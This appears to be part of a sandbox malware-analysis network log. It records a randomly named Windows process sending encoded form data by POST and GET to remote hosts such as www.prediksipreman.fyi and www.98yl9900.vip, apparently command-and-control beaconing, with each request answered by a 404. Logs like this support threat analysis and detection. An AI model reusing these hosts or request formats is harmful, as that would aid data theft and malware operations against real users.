Nov 4, 2024 10:11:25.646097898 CET	10852	OUT	POST /fy4q/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.prediksipreman.fyi/fy4q/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 72 65 6a 6f 52 62 68 30 6e 6b 67 61 4d 50 74 53 75 73 4f 79 6d 6d 31 42 45 76 37 30 59 6a 74 68 71 75 64 56 70 77 2b 6c 48 4e 2f 32 65 49 57 32 64 46 72 31 59 6b 39 56 4c 69 71 66 43 51 51 73 32 64 52 75 6d 46 2f 69 59 68 6a 46 52 4a 50 42 49 69 76 4f 44 35 78 63 4d 4e 2b 47 6e 31 4a 2f 2f 4d 31 43 68 52 63 63 58 4d 41 34 61 65 6a 35 79 62 6d 68 35 59 62 77 35 38 56 2b 78 67 2f 64 4d 68 69 67 61 58 65 4b 66 2f 6c 42 35 2b 30 47 42 5a 78 44 6b 72 43 55 51 77 59 6d 69 53 77 42 6f 6d 4a 43 41 44 6c 71 37 39 79 71 2f 66 4e 38 6f 52 56 50 79 79 76 55 74 56 50 31 47 44 2b 48 31 41 78 47 7a 51 69 4c 42 6f 71 46 70 44 4a 77 2b 72 66 47 61 36 4a 74 71 66 78 6a 2f 6a 65 32 53 6b 68 4d 76 47 44 55 30 2b 78 4d 74 71 45 56 50 75 2b 76 4c 71 56 4b 4b 71 4e 75 70 79 36 52 78 54 38 57 67 6c 4a 4d 4b 2b 7a 61 72 4a 37 4d 47 33 66 4e 4e 37 51 32 77 31 72 44 4f 38 4b 42 37 7a 48 4f 76 31 39 72 32 6c 4f 30 6d 37 4a 52 58 54 6c 74 36 70 32 52 37 72 34 41 68 46 35 47 65 51 2b 57 50 4d 6f 4b 50 33 6e 39 4c 50 [TRUNCATED] Data Ascii: Q8r=rejoRbh0nkgaMPtSusOymm1BEv70YjthqudVpw+lHN/2eIW2dFr1Yk9VLiqfCQQs2dRumF/iYhjFRJPBIivOD5xcMN+Gn1J//M1ChRccXMA4aej5ybmh5Ybw58V+xg/dMhigaXeKf/lB5+0GBZxDkrCUQwYmiSwBomJCADlq79yq/fN8oRVPyyvUtVP1GD+H1AxGzQiLBoqFpDJw+rfGa6Jtqfxj/je2SkhMvGDU0+xMtqEVPu+vLqVKKqNupy6RxT8WglJMK+zarJ7MG3fNN7Q2w1rDO8KB7zHOv19r2lO0m7JRXTlt6p2R7r4AhF5GeQ+WPMoKP3n9LP5LP4Mv0CPH8Tu5dqpJN9PYgC1+THYU2eGayLJtBi5K6YxFW9fILSdo9WKJA9QdNYp5TtC3fwCaZ0Hvo2tCB7FMfYXa/B/BVB4uOFYpak8sFx6omk2QjPIfvv6x82EgWCOVUpG5im0ZmKligFG0JER9W/DX+idiYhprk55YG7oH2lp57fayqknm+F9Sir6QNjF0MTcYoWOWX6puJhdO8QD92I0dJLIxFlTeSA9DFkdM4GZDv3h3nwIgTBFWLk3R8K3FinddgTmXfBrAJwiAZzgnXAzKN9Iufy7cwPYRT+qLpJQBfuVHK47Z8CA7jjNyKbtBmX/LKvmP3a/Tz2V4dKru3QaEXqr3hw0/5UBkj/d7FUCVWDJmF+1OTtqM39pSULqQ4L91hTtu/UA/qa0glzO91wmyrrdsn4b/ffxy+6ttxLiGxGMpt/Vjovx32gSCEGXr7q9CQEzkc0y2fQ3v1V1d7E4xAC/ndT2gAWjZJwTD0KEMEBO5nez/6pZkBEXq6jJc0pDgl03Ry5EMokTJeVpV86hfERdZL4BZOoI7HIq1ZnSOqRgQXbsFxvXELO/QuUdgto6FWXPAgIM/Q/Z/4mSKybHo+2xPWX71iZ1SKtbbQDywvY7HhTlY/sXjFbY8FQYkGfXMkFUC30vQp46Ww99qpjdj/yQfgrZU [TRUNCATED]
Nov 4, 2024 10:11:26.346781969 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 04 Nov 2024 09:11:26 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae fe 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e9 7c fb ed f2 98 b8 95 09 46 54 f9 bd 7b ac c3 e6 e9 8e c9 d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 66 51 ba d5 53 5d 79 f7 e4 dd a7 74 4c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 52 98 7e 62 fe 23 33 b8 2e 0f 0b b7 bc 9a 82 bc a3 9e 9a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c6 f7 a5 6d c6 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 39 ab 06 d3 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 56 e6 9c 06 7f bf 0c ed 5f fb e6 01 e9 dc 7b 66 12 c6 a7 87 01 55 80 65 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 4e 2b c3 b3 fb 30 40 89 bc 7b [TRUNCATED] Data Ascii: 134FZJrnhztDo$@B%tEw5d.4}f2:~bPAP%=\|FT{MwrIe`fQS]ytL;pE_J{tR~b#3.tngEu5xr&AUhm;b9NG(^n/^V_{fUe7n*/L-B/?N+0@{{T+1J`,PQ.>lc8/7'L,0}?_vfry8a&gv&JLdU~Y?}"xW<KK>Lfre.meeVu7/yVAfYfL/5u;_w\Xq]ps:n\UNa}K{-G'ua&H~00}3qCVVUY0xl/+,+I+^kga\[NBf:Aev]~m?Z+5"&7~#EF7--L/>eu+=SwU+g^Wvx8WhC('x#n^@Jbg>wabjO}ejv}m_.z9^GY[#Q@PY(q>gM@F[[@t.8g\|D%~
Nov 4, 2024 10:11:26.346915960 CET	212	IN	Data Raw: 9c f1 29 81 12 f8 9b 1a de f8 f9 5b e2 3a a1 39 f8 53 02 1c e9 8b 62 c6 23 32 ef fe 7c b3 cc 2d 6a 6f ba 7b e1 e5 59 79 89 50 0f 83 c2 8d 81 af 6b 6e 0c b0 1f d3 7b 2c 60 3f ed c3 20 08 1d c7 4d df 58 ea 7b fb 76 15 9f 2e c8 7e b6 eb f7 e3 de d8 Data Ascii: )[:9Sb#2\|-jo{YyPkn{,`? MX{v.~ga~'PSy\pC{K;v-}K;c#,{PuBz2}GH}/>7y!#?6x!
Nov 4, 2024 10:11:26.346925974 CET	1236	IN	Data Raw: fb c7 1a ee 47 bc 19 97 69 95 59 5c 57 1f 18 d7 cb 61 fc ca 7f f4 33 fb f6 7a bc f9 a0 eb 75 4b c8 cd 39 bd 9f 76 23 9c 97 03 f7 b3 f6 3f 00 d0 4d bc fe 4c f1 6f 54 3f 70 3e 93 09 10 ed ff c2 f9 fc e8 36 ea 22 fe 93 63 56 e6 c3 c5 8d c0 79 ea ff Data Ascii: GiY\Wa3zuK9v#?MLoT?p>6"cVy2KwD\|7Rk9ghJ8OJJLR4?CYVvjCmQK!K4.fx:2ux1z2;\|gYfuL>Ca!;@IMu.>%
Nov 4, 2024 10:11:26.347342968 CET	1236	IN	Data Raw: cc 09 8d 73 68 79 29 53 13 79 b9 35 b8 b6 3e 0e 09 2a 50 dc 0e 97 4d 51 5d b4 82 28 aa b1 1a 29 56 5b 6a d3 dc 49 1c 0b 0e 58 72 bd 62 99 76 4d d7 e4 16 47 ca 95 18 ae c6 00 31 ed 7e cc f8 94 cb 1e 62 53 9a 44 15 c5 22 90 d4 b5 20 39 4d ee ca b5 Data Ascii: shy)Sy5>*PMQ]()V[jIXrbvMG1~bSD" 9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGf
Nov 4, 2024 10:11:26.347354889 CET	1236	IN	Data Raw: 34 05 3c 08 7a 5d 8e cb 64 13 90 a2 b0 e1 c5 76 56 2d 4e e3 5a 1e 29 2e dc 52 69 41 77 cb 94 32 4f e2 6a b1 8d 54 b2 cd e8 f9 49 83 20 47 5f 97 35 37 87 16 64 8e d1 2c e1 f1 4e e9 1d 83 8e 57 d7 ea 3e ae 05 7d b1 2b b4 12 1c ae 68 0e 59 fa 67 31 Data Ascii: 4<z]dvV-NZ).RiAw2OjTI G_57d,NW>}+hYg1.LlvtLwI*(<k<$b{JlxM=0 .cH)v Hv\d)Nkt56!]i,NKJ!"jMVx;uW$FNcYXp8.Y
Nov 4, 2024 10:11:26.347364902 CET	79	IN	Data Raw: a9 7f 86 cc f7 32 7b 29 2a de 7d 63 be d7 17 ff fb bf 40 05 08 1d 0d ae a9 7d a0 b2 67 b5 99 37 0a 79 8f af 47 f8 5a 6b 8f f0 73 fc 7a bc 5c 93 fb f6 db ff 00 00 00 ff ff 0d 0a 41 0d 0a 03 00 40 df 63 f8 84 27 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2{)*}c@}g7yGZksz\A@c'0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49912	162.0.215.244	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:28.183389902 CET	470	OUT	GET /fy4q/?Q8r=mcLISvp6nW4sNO0Oj8jOpWhNNbX1eENX6bIi/iiCJdbobbylfQD4XX0OLgusDywc0PIJxHOPAGfsQI2vBEzMGplJEOCqrWIF9aldzRVMXORMZ/L63cm0yJs=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.prediksipreman.fyi Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:11:28.863142014 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Mon, 04 Nov 2024 09:11:28 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Nov 4, 2024 10:11:28.863238096 CET	212	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info {
Nov 4, 2024 10:11:28.863328934 CET	1236	IN	Data Raw: 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0;
Nov 4, 2024 10:11:28.863601923 CET	1236	IN	Data Raw: 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 Data Ascii: fo-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img {
Nov 4, 2024 10:11:28.863614082 CET	1236	IN	Data Raw: 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b Data Ascii: er address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
Nov 4, 2024 10:11:28.863626003 CET	636	IN	Data Raw: 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f Data Ascii: fRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4
Nov 4, 2024 10:11:28.864270926 CET	1236	IN	Data Raw: 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 Data Ascii: chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPe
Nov 4, 2024 10:11:28.864285946 CET	1236	IN	Data Raw: 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 Data Ascii: us8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD
Nov 4, 2024 10:11:28.864300966 CET	1236	IN	Data Raw: 58 74 65 65 43 56 37 5a 6a 67 2f 77 75 61 38 59 47 6c 33 58 76 44 55 50 79 2f 63 2f 41 76 64 34 2f 68 4e 44 53 71 65 67 51 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67 67 67 3d 3d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 Data Ascii: XteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; } .status-reason
Nov 4, 2024 10:11:28.864973068 CET	846	IN	Data Raw: 69 6e 66 6f 2d 69 6d 61 67 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: info-image" /> <div class="info-heading"> www.prediksipreman.fyi/cp_errordocument.shtml (port 80) </div> </li>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49940	104.21.3.144	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:33.951836109 CET	732	OUT	POST /vpuy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.98yl9900.vip Origin: http://www.98yl9900.vip Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.98yl9900.vip/vpuy/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 4c 71 4a 48 4d 65 43 31 67 33 43 2f 77 4c 65 76 38 34 5a 63 6d 36 56 68 63 43 32 7a 61 77 4f 57 6c 72 2f 4a 73 49 47 74 31 46 68 2b 2b 75 4f 71 75 52 35 75 67 56 73 58 50 4d 2b 71 36 31 43 2b 73 79 6a 4c 7a 42 66 6a 73 51 2f 75 4e 4f 63 44 79 67 39 47 42 55 33 52 52 77 45 6b 65 34 78 4f 46 42 33 70 6d 66 52 52 62 5a 4c 67 49 56 2f 47 34 55 43 4b 71 78 56 77 70 4f 38 39 36 42 69 56 67 2b 30 6b 56 79 2b 2b 4b 64 76 54 53 6e 56 6f 34 35 45 44 76 36 35 4f 62 2f 58 48 32 74 41 4c 63 62 47 51 30 2b 65 56 55 6e 52 58 71 6f 37 52 36 45 4a 6d 37 70 68 49 45 62 2b 33 66 2f 67 39 38 51 3d 3d Data Ascii: Q8r=LqJHMeC1g3C/wLev84Zcm6VhcC2zawOWlr/JsIGt1Fh++uOquR5ugVsXPM+q61C+syjLzBfjsQ/uNOcDyg9GBU3RRwEke4xOFB3pmfRRbZLgIV/G4UCKqxVwpO896BiVg+0kVy++KdvTSnVo45EDv65Ob/XH2tALcbGQ0+eVUnRXqo7R6EJm7phIEb+3f/g98Q==
Nov 4, 2024 10:11:35.035046101 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:11:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Allow-Headers: * Cache-Control: no-cache, private cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8a%2BgM6wUYdfYs8PNGbqae9ic%2F0cASnuO6vF%2FD4T7hbd0s52l6TOvmv3v3cqOV%2B69aR759IZn32lTcMypaSEQxhMCxp60hm9Vm5WC2CvoyQJsFzX1YaKFYpiAl5MzF1qFBktj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd37a3868222cd0-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5 5e ff a6 0c b3 9b 41 97 Data Ascii: 17dlRn0+U,'Y6>CS\F=]^Y,fv1\| I9DQK),}A 9'XR8p@6,em"%/}pv6:r.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3^A
Nov 4, 2024 10:11:35.035157919 CET	109	IN	Data Raw: 27 e3 c4 c6 3d 25 7f 17 95 f7 33 5b 5d b4 3d 0d 5a e9 3d 0a 23 bd 5f 8a 93 51 f1 7f 7e 5e a7 ab 35 3b d7 45 08 35 a1 95 15 a1 e3 1d a4 23 18 e6 ad b6 15 4a 76 28 78 67 14 2c 07 6c 08 65 bf a6 49 9e d4 e9 65 d3 3c 51 7a ff 66 79 f4 99 27 c3 77 7b Data Ascii: '=%3[]=Z=#_Q~^5;E5#Jv(xg,leIe<Qzfy'w{a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49953	104.21.3.144	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:36.500694036 CET	752	OUT	POST /vpuy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.98yl9900.vip Origin: http://www.98yl9900.vip Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.98yl9900.vip/vpuy/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 4c 71 4a 48 4d 65 43 31 67 33 43 2f 32 72 75 76 36 62 68 63 68 61 56 69 59 79 32 7a 55 51 4f 53 6c 72 7a 4a 73 4a 54 32 32 33 56 2b 2f 4d 47 71 2f 6c 4e 75 6a 56 73 58 41 63 2b 6c 31 56 43 4c 73 79 6e 6c 7a 42 54 6a 73 51 62 75 4e 50 73 44 79 54 6c 46 4f 6b 33 54 45 67 45 6d 51 59 78 4f 46 42 33 70 6d 66 46 37 62 64 6e 67 4a 6b 50 47 71 6c 43 4a 67 52 56 78 2f 65 38 39 2b 42 6a 63 67 2b 30 53 56 78 37 62 4b 62 6a 54 53 6d 6c 6f 35 74 59 63 36 4b 35 49 47 76 58 5a 37 64 74 59 44 36 50 76 33 38 33 33 64 33 6c 78 72 75 32 4c 72 31 6f 78 70 70 46 37 5a 63 33 44 53 38 64 30 6e 53 45 54 70 39 76 47 30 34 6e 6e 6e 7a 47 39 55 7a 7a 4d 38 74 45 3d Data Ascii: Q8r=LqJHMeC1g3C/2ruv6bhchaViYy2zUQOSlrzJsJT223V+/MGq/lNujVsXAc+l1VCLsynlzBTjsQbuNPsDyTlFOk3TEgEmQYxOFB3pmfF7bdngJkPGqlCJgRVx/e89+Bjcg+0SVx7bKbjTSmlo5tYc6K5IGvXZ7dtYD6Pv3833d3lxru2Lr1oxppF7Zc3DS8d0nSETp9vG04nnnzG9UzzM8tE=
Nov 4, 2024 10:11:37.604165077 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 09:11:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Allow-Headers: * Cache-Control: no-cache, private cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUcaFe%2FdHGjO4EE5aQE8Q2cfNg3%2BfoN%2BitF4jHZz%2BcWKRtidLntiPEW4JpsscEmo3yb0%2Beil%2BUzppnNdGk46G3KLS%2F25D%2BJOREAB1ey38abzcC0XSRFXdRaaXkqqtQHobqXC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd37a48af0fe987-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1180&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 38 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab 